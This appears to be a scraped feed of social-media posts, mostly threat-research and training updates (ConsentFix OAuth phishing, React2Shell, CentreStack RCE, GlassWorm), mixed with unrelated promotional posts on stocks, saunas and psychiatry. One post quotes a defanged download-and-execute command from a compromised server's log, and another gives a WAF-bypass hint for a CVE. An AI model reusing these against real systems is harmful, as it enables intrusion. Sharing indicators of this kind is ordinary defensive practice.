"'ConsentFix', a browser-based ClickFix-style attack with OAuth consent grants" ... leveraging the Azure CLI app client to social engineer for easy access into Entra ID 👀 I got nerdsniped by this, so I played with it a bit and tried a drag-and-drop gesture! Video:

Learn Cyber Deception!

What? @_JohnHammond the podcast intro guy!? wait what!? Honestly so much fun on this one, and John totally out did us by coming insanely well prepared with all the Christmas decorations...

Episode 26: (Christmas) War Stories with John Hammond! @0xTib3rius & @SwiftSecur1 are joined by @_JohnHammond who shares some war stories in our first Christmas episode! Links below!

Congrats @RussianPanda9xx for winning the Community Cyber Defender Practitioner of the Year award in the 2025 SANS Difference Makers Awards! First award for a @HuntressLabs teammate! #SANSDMA

$MU posted great earnings, giving some relief to the AI trade skepticism. What's next for Micron, is it still a buy?

🚨 New Course 🚨 WMD 5 continues the Windows Malware Dev Advanced Path! Make your own custom C2 agent with @DahvidSchloss, former US Special Ops & @defcon Instructor. https://t.co/OWysu64f13 With 12.5 hours of video, written instructions, quizzes and your own dedicated virtual

Good luck to all bidders in the Ginger Hacker Initiative Silent Auction 2025! Your winning bids go to a worthy cause, and you just might win some great training from @_JohnHammond, @mish3alkhan & @Antonlovesdnb from our list of donations from https://t.co/wi55NNKCBc: 🎁 1

Infostealer malware logs -- maybe an unconventional threat intel source, but Estelle Ruellan shows me her sweet research using LLMs to analyze stealer logs at scale: - How did a victim get infected? - Can we uncover a threat actor when they infect themselves? and more. Video:

Most Americans would be shocked to learn this: a foreign national can harm a U.S. citizen—and DHS does not require officers to consider that harm when deciding if they may enter or remain in the United States. Codias Law is calling on @DHSgov to adopt Direct Harm to U.S.

Before React exploded I was helping chase some more shenanigans with Gladinet CentreStack & Triofox-- another LFI vulnerability that led (again) to the .NET ViewState deserialization CVE-2025-30406 remote code execution. Patch is available but we're seeing active exploitation:

Errybody screaming about React2Shell so we wanted to give ya something you haven't already heard😁 Here's a beast of a blog post on malware we've seen from post-exploitation, detailing a wild Linux backdoor and more -- all from the amazing & incredible @RussianPanda9xx & co.😎

Errybody screaming about React2Shell so we wanted to give ya something you haven't already heard😁 Here's a beast of a blog post on malware we've seen from post-exploitation, detailing a wild Linux backdoor and more -- all from the amazing & incredible @RussianPanda9xx & co.😎

Continuing THE FUTURE IS ****** comic book Capture The Flag challenges! Carving email attachments to uncover malicious Microsoft Office macros with olevba, prompt injection within an AI chatbot, and tracking network packets to uncover flags! Video: https://t.co/vwK2TPLCLK

I built this quiz for people who are ready to stop paying for spa sessions and bring the experience home. Tap through and take the sauna quiz, see which setup fits your life.

The release of the ConDef MCP is coming 👀 What can it do ? ▶️List modules by "tag" or "keyword" - love networking? Ask Claude to show you modules with networking components only ▶️Summarize and explain modules for newer folks ▶️Integrate with ATT&CK & Atomic Red Team

Beginner Blue Team Training!

Someone emailed me a log from a VPS with a vulnerable NextJS version that was presumably compromised by React2Shell. Unsure if others are seeing similar, but seems to be dumbo cryptominer. - ping 45.157.233[.]80 - wget http[:]//45.76.155[.]14/vim -O /tmp/vim ; chmod +x

Yapping about the GlassWorm supply chain malware campaign and the neato tricks it uses with "Invisible Unicode" characters -- essentially whitespace steganography, showcasing the Hangul Filler, zero-width space, & Private Use Area characters 🤯 Video: https://t.co/QAwvC8s4wv

🧵What if the DSM is holding psychiatry back? Modern mental health is about to radically change. Most psychiatric diagnoses today are still based on the DSM — a system built on: • symptom checklists • clinical observation • consensus categories Not objective biology.

#CVE-2025-55182: RSC RCE — Full Unicode encoding can bypass certain WAFs that lack proper decoding or normalization capabilities. Please verify this on your end.

rambled about react: https://t.co/mUTn8rDC47

Big thanks to @tryhackme for their continued support of the channel! You can jump into the Advent of Cyber 2025 event right now, it is free to play and anyone can join to level up their cybersecurity skills with a new task every day!

Flattered to help start the party for the Advent of Cyber Day 02 task from TryHackMe -- walking through today's challenge using the Social Engineer Toolkit to send a phishing email and snag passwords with a simple Python HTTP server! Video: https://t.co/Yr9zT0wPPN

What do you think? Should we have a 24-hour trading day in the US?